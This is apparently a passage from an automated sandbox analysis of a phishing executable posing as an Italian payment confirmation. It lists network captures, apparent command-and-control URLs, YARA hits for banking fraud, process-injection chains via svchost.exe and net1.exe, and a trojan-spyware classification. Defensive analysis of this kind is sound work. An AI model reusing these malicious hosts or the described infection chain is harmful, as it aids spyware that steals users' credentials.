cfL4;desc="?proto=TCP&rtt=106797&min_rtt=106797&rtt_var=53398&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=2777&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vO%2B2eZwXwREyXyp08glH11SE4aqcatu%2FGY%2FRRg9JYykI9B9yyyUV871jMSSvkfsyieRBUfM%2Bfv6k9c%2BMPbifvtX37hdyCFZRtM6Pf4scB%2B8fVdgsj0n4DVZzLfzSzNTlWFjr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9277821c1a184238-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=90326&min_rtt=90326&rtt_var=45163&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=816&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVG2cloS8Wf2MCWYv0%2FOy2jcBoRcolgBG%2FEQLETpnrWfXDhwCRLaoQUhHsJa8TFspljcCi4f0Ks%2FxGskFf4AkLeprpkVK0opvIKmOEGScRk8UJUufrN5BbVuCKk7kZOrz%2FNj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9277822c8ab4e226-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=89732&min_rtt=89732&rtt_var=44866&sent=4&recv=7&lost=0&retrans=0&sent_bytes=0&recv_bytes=4241&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWmrW3qd%2Fuo90CZd6dtPY5BGkvfcTm%2B5LLdkKT1PS2eDmxB%2BrogMlk3TnEB8J6q2czJ%2B%2FcG5DCAltnNsCkhablQJpoum2nsFvnXqGlVL%2BHsw4eAhSltA5bdksMv0At2BbGPe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9277823cf9d1f78f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=89267&min_rtt=89267&rtt_var=44633&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 13:35:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: net1.exe, 00000004.00000002.627948410.0000000061ECD000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: BupJjuMCJB.exe, 00000005.00000002.626989631.00000000005B8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.streartex.live
            Source: BupJjuMCJB.exe, 00000005.00000002.626989631.00000000005B8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.streartex.live/qmo0/
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: net1.exe, 00000004.00000003.467962206.0000000006534000.00000004.00000020.00020000.00000000.sdmp, 1n61p-.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: net1.exe, 00000004.00000003.468329134.0000000006550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: net1.exe, 00000004.00000002.627691581.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000004.00000002.627315561.0000000001886000.00000004.10000000.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000002.627266394.00000000035F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 1n61p-.4.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: net1.exe, 00000004.00000002.627315561.0000000001D3C000.00000004.10000000.00040000.00000000.sdmp, BupJjuMCJB.exe, 00000005.00000002.627266394.0000000003AAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.morpakampus.com/3lf9/?Up5Dxd=5GxzxjzYtuQVaXKi96wJQlL5jVVVED3gsqLy8xSnFJL9Njv/LCMj1519KCJ

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000002.00000002.419495871.0000000000290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626895631.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419524838.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626885310.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.626989631.0000000000560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.626861797.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.481410737.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.419614314.0000000001FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.627085177.0000000003E60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000002.359600734.0000000001314000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_de48dd3a-7
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000002.359600734.0000000001314000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2d363ec6-d
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5f01986e-3
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bf02b5bf-c
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: sqlite3.dll.4.drStatic PE information: Number of sections : 18 > 10
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.354451283.0000000002B3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTERA DI CONFERMA DEL PAGAMENTO.exe
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.359072755.0000000002D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTERA DI CONFERMA DEL PAGAMENTO.exe
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000003.356094084.0000000002B3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LETTERA DI CONFERMA DEL PAGAMENTO.exe
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exe, 00000000.00000002.359539393.0000000000777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs LETTERA DI CONFERMA DEL PAGAMENTO.exe
            Source: C:\Windows\SysWOW64\net1.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@8/6
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeFile created: C:\Users\user\AppData\Local\Temp\aut28B6.tmpJump to behavior
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\net1.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: net1.exe, 00000004.00000002.627925855.0000000061EB2000.00000002.00000001.01000000.00000008.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
            Source: LETTERA DI CONFERMA DEL PAGAMENTO.exeVirustotal: Detection: 42%
            Source: unknownProcess created: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe"
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe"
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeProcess created: C:\Windows\SysWOW64\net1.exe "C:\Windows\SysWOW64\net1.exe"
            Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe"Jump to behavior
            Source: C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exeProcess created: C:\Windows\SysWOW64\net1.exe "C:\Windows\SysWOW64\net1.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exeSection loaded: winmm.dllJump to behavior
